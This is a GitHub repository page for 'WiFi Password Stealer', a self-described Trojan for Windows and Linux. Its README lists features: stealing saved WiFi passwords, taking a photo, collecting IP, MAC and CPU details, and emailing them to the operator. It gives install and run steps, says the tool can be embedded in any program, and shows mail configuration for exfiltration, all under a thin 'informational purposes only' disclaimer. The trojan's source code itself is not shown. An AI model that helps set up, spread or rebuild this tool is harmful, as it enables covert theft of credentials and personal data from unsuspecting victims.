Skip to content

A simple Trojan that receives passwords from WIFI and sends us an email

Notifications You must be signed in to change notification settings

paveldat/wifi_password_stealer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 

Repository files navigation

WiFi Password Stealer

This is against the law, so this code is provided for informational purposes only. I am not responsible for further consequences.

How to install

  1. Clone this repository on your computer https://github.com/paveldat/wifi_password_stealer.git
  2. Install all the requirements run libraries.bat or pip install -r requirements.txt
  3. Run the program python trojan.py

Features

  • Works with Windows and Linux
  • Automatically detects what language Windows is in
  • Takes a photo
  • Sends WiFi name and passwords to us by email
  • Gets information about the computer, such as IP, MAC address, time, CPU information, and writes everything to a file
  • This file is attached to the message
  • Can add to any program and receive information

How to setup

Set up mail. Enter the mail data from which messages will be sent, as well as to whom.

email = '<sourse>@mail.ru'
password = '<password>'
dest_email = '<destination>@mail.ru'